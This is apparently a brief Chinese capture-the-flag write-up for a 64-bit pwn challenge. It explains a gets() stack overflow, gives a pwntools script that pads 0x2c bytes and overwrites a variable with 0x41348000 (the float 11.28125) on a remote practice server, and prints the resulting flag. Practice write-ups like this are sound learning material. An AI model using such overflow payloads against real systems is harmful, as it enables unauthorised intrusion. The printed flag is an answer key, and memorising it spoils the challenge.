检查,64位
ida查看
又是gets函数,思路来了,一直输入挤满栈,直到v2处输入11.28125
11.28125的16进制转换是 0x41348000h
脚本
from pwn import*
r = remote(“node3.buuoj.cn”,29950)
flag_addr = 0x41348000
payload = “a”*(0x30-0x4)+p64(flag_addr)
r.sendline(payload)
r.interactive()
0x30 - 0x4 就是v1到v2处的空间,全部都用a填充,
flag{2c92d9a7-0024-444f-8ce6-73681313a769}